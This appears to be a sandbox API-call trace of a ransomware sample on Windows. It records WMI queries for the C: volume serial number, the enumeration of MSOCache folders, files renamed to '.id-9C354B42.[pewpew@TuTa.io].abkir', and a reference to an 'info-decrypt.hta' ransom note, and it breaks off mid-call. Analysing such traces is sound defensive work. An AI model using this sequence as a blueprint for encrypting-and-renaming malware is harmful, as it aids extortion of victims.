Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e754 | out: ppvObject=0x6c0e754*=0x0) returned 0x80004002 [0207.908] WbemLocator:IUnknown:QueryInterface (in: This=0x6027210, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e704 | out: ppvObject=0x6c0e704*=0x0) returned 0x80004002 [0207.908] WbemLocator:IUnknown:QueryInterface (in: This=0x6027210, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e710 | out: ppvObject=0x6c0e710*=0x0) returned 0x80004002 [0207.909] CoGetContextToken (in: pToken=0x6c0e770 | out: pToken=0x6c0e770) returned 0x0 [0207.909] CoGetContextToken (in: pToken=0x6c0eb78 | out: pToken=0x6c0eb78) returned 0x0 [0207.909] WbemLocator:IUnknown:QueryInterface (in: This=0x6027210, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec08 | out: ppvObject=0x6c0ec08*=0x0) returned 0x80004002 [0207.909] WbemLocator:IUnknown:Release (This=0x6027210) returned 0x2 [0207.909] WbemLocator:IUnknown:Release (This=0x6027210) returned 0x1 [0207.909] CoGetContextToken (in: pToken=0x6c0f1e8 | out: pToken=0x6c0f1e8) returned 0x0 [0207.909] CoGetContextToken (in: pToken=0x6c0f148 | out: pToken=0x6c0f148) returned 0x0 [0207.909] WbemLocator:IUnknown:QueryInterface (in: This=0x6027210, riid=0x6c0f218*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6c0f214 | out: ppvObject=0x6c0f214*=0x6027210) returned 0x0 [0207.909] WbemLocator:IUnknown:AddRef (This=0x6027210) returned 0x3 [0207.909] WbemLocator:IUnknown:Release (This=0x6027210) returned 0x2 [0207.909] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60312e0, puCount=0x6c0f3ac | out: puCount=0x6c0f3ac*=0x2) returned 0x0 [0207.909] WbemDefPath:IWbemPath:GetText (in: This=0x60312e0, lFlags=8, puBuffLength=0x6c0f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3a8*=0xf, pszText=0x0) returned 0x0 [0207.909] WbemDefPath:IWbemPath:GetText (in: This=0x60312e0, lFlags=8, puBuffLength=0x6c0f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.909] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6c0f284 | out: ppv=0x6c0f284*=0x60271b0) returned 0x0 [0207.909] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60271b0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6c0f318 | out: ppNamespace=0x6c0f318*=0x603305c) returned 0x0 [0208.361] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1b4 | out: ppvObject=0x6c0f1b4*=0xb5b4f4) returned 0x0 [0208.361] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b4f4, pProxy=0x603305c, pAuthnSvc=0x6c0f204, pAuthzSvc=0x6c0f200, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc, pImpLevel=0x6c0f1ec, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4 | out: pAuthnSvc=0x6c0f204*=0xa, pAuthzSvc=0x6c0f200*=0x0, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc*=0x6, pImpLevel=0x6c0f1ec*=0x2, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4*=0x1) returned 0x0 [0208.361] WbemLocator:IUnknown:Release (This=0xb5b4f4) returned 0x1 [0208.361] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a8 | out: ppvObject=0x6c0f1a8*=0xb5b514) returned 0x0 [0208.362] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a4 | out: ppvObject=0x6c0f1a4*=0xb5b4f4) returned 0x0 [0208.362] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b4f4, pProxy=0x603305c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0208.362] WbemLocator:IUnknown:Release (This=0xb5b4f4) returned 0x2 [0208.362] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x1 [0208.362] CoTaskMemFree (pv=0xbd4918) [0208.362] WbemLocator:IUnknown:Release (This=0x60271b0) returned 0x0 [0208.362] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eda4 | out: ppvObject=0x6c0eda4*=0xb5b514) returned 0x0 [0208.362] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ed60 | out: ppvObject=0x6c0ed60*=0x0) returned 0x80004002 [0208.363] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0eb7c | out: ppvObject=0x6c0eb7c*=0x0) returned 0x80004002 [0208.363] WbemLocator:IUnknown:AddRef (This=0xb5b514) returned 0x3 [0208.363] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e6bc | out: ppvObject=0x6c0e6bc*=0x0) returned 0x80004002 [0208.364] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e66c | out: ppvObject=0x6c0e66c*=0x0) returned 0x80004002 [0208.364] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e678 | out: ppvObject=0x6c0e678*=0xb5b474) returned 0x0 [0208.364] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b474, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e680 | out: pCid=0x6c0e680*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0208.364] WbemLocator:IUnknown:Release (This=0xb5b474) returned 0x3 [0208.364] CoGetContextToken (in: pToken=0x6c0e6d8 | out: pToken=0x6c0e6d8) returned 0x0 [0208.364] CoGetContextToken (in: pToken=0x6c0eae0 | out: pToken=0x6c0eae0) returned 0x0 [0208.364] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb70 | out: ppvObject=0x6c0eb70*=0xb5b4fc) returned 0x0 [0208.364] WbemLocator:IRpcOptions:Query (in: This=0xb5b4fc, pPrx=0xb5b514, dwProperty=2, pdwValue=0x6c0eb98 | out: pdwValue=0x6c0eb98) returned 0x80004002 [0208.364] WbemLocator:IUnknown:Release (This=0xb5b4fc) returned 0x3 [0208.365] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x2 [0208.365] CoGetContextToken (in: pToken=0x6c0f0b8 | out: pToken=0x6c0f0b8) returned 0x0 [0208.365] CoGetContextToken (in: pToken=0x6c0f018 | out: pToken=0x6c0f018) returned 0x0 [0208.365] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x6c0f0e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6c0f0e4 | out: ppvObject=0x6c0f0e4*=0x603305c) returned 0x0 [0208.365] WbemLocator:IUnknown:AddRef (This=0x603305c) returned 0x4 [0208.365] WbemLocator:IUnknown:Release (This=0x603305c) returned 0x3 [0208.365] WbemLocator:IUnknown:Release (This=0x603305c) returned 0x2 [0208.365] SysStringLen (param_1=0x0) returned 0x0 [0208.365] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60309b0, puCount=0x6c0f47c | out: puCount=0x6c0f47c*=0x0) returned 0x0 [0208.365] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=2, puBuffLength=0x6c0f478*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f478*=0x20, pszText=0x0) returned 0x0 [0208.365] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=2, puBuffLength=0x6c0f478*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f478*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0208.365] CoGetContextToken (in: pToken=0x6c0f0e8 | out: pToken=0x6c0f0e8) returned 0x0 [0208.365] WbemLocator:IUnknown:AddRef (This=0xb5b514) returned 0x3 [0208.365] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b514, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef7c | out: ppvObject=0x6c0ef7c*=0xb5b514) returned 0x0 [0208.365] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x3 [0208.365] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x2 [0208.365] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=2, puBuffLength=0x6c0f480*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f480*=0x20, pszText=0x0) returned 0x0 [0208.365] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=2, puBuffLength=0x6c0f480*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f480*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0208.366] IWbemServices:GetObject (in: This=0x603305c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6c0f434*=0x0, ppCallResult=0x0 | out: ppObject=0x6c0f434*=0x6027e50, ppCallResult=0x0) returned 0x0 [0208.570] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60312e0, puCount=0x6c0f434 | out: puCount=0x6c0f434*=0x2) returned 0x0 [0208.570] WbemDefPath:IWbemPath:GetText (in: This=0x60312e0, lFlags=4, puBuffLength=0x6c0f430*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f430*=0xf, pszText=0x0) returned 0x0 [0208.570] WbemDefPath:IWbemPath:GetText (in: This=0x60312e0, lFlags=4, puBuffLength=0x6c0f430*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f430*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0208.570] IWbemClassObject:Get (in: This=0x6027e50, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x364a094*=0, plFlavor=0x364a098*=0 | out: pVal=0x6c0f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x364a094*=8, plFlavor=0x364a098*=0) returned 0x0 [0208.570] SysStringByteLen (bstr="9C354B42") returned 0x10 [0208.570] SysStringByteLen (bstr="9C354B42") returned 0x10 [0208.570] IWbemClassObject:Get (in: This=0x6027e50, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x364a094*=8, plFlavor=0x364a098*=0 | out: pVal=0x6c0f438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x364a094*=8, plFlavor=0x364a098*=0) returned 0x0 [0208.570] SysStringByteLen (bstr="9C354B42") returned 0x10 [0208.570] SysStringByteLen (bstr="9C354B42") returned 0x10 [0208.570] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0208.570] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x6b [0208.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f498) returned 1 [0208.570] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x6c0f514 | out: lpFileInformation=0x6c0f514*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x359664a0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0208.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f494) returned 1 [0208.571] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0208.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f5dc) returned 1 [0208.575] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x6c0f0e4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0208.575] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x6c0f0b8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0208.575] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6c0f304 | out: lpFindFileData=0x6c0f304*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f110 [0208.576] FindNextFileW (in: hFindFile=0xb7f110, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.576] FindNextFileW (in: hFindFile=0xb7f110, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0208.576] FindNextFileW (in: hFindFile=0xb7f110, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc967850, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x29c6dbd, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordLR.cab", cAlternateFileName="")) returned 1 [0208.576] FindNextFileW (in: hFindFile=0xb7f110, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x267e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordMUI.msi", cAlternateFileName="")) returned 1 [0208.576] FindNextFileW (in: hFindFile=0xb7f110, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 1 [0208.576] FindNextFileW (in: hFindFile=0xb7f110, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0208.577] FindClose (in: hFindFile=0xb7f110 | out: hFindFile=0xb7f110) returned 1 [0208.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f59c) returned 1 [0208.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f5a8) returned 1 [0208.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f5dc) returned 1 [0208.577] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x6c0f0e4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0208.577] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x6c0f0b8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0208.577] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6c0f304 | out: lpFindFileData=0x6c0f304*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f110 [0208.577] FindNextFileW (in: hFindFile=0xb7f110, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.578] FindNextFileW (in: hFindFile=0xb7f110, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0208.578] FindNextFileW (in: hFindFile=0xb7f110, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc967850, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x29c6dbd, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordLR.cab", cAlternateFileName="")) returned 1 [0208.578] FindNextFileW (in: hFindFile=0xb7f110, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x267e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordMUI.msi", cAlternateFileName="")) returned 1 [0208.578] FindNextFileW (in: hFindFile=0xb7f110, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 1 [0208.578] FindNextFileW (in: hFindFile=0xb7f110, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 0 [0208.579] FindClose (in: hFindFile=0xb7f110 | out: hFindFile=0xb7f110) returned 1 [0208.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f59c) returned 1 [0208.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f5a8) returned 1 [0208.579] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0208.579] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0208.579] SetThreadErrorMode (dwNewMode=0x1, 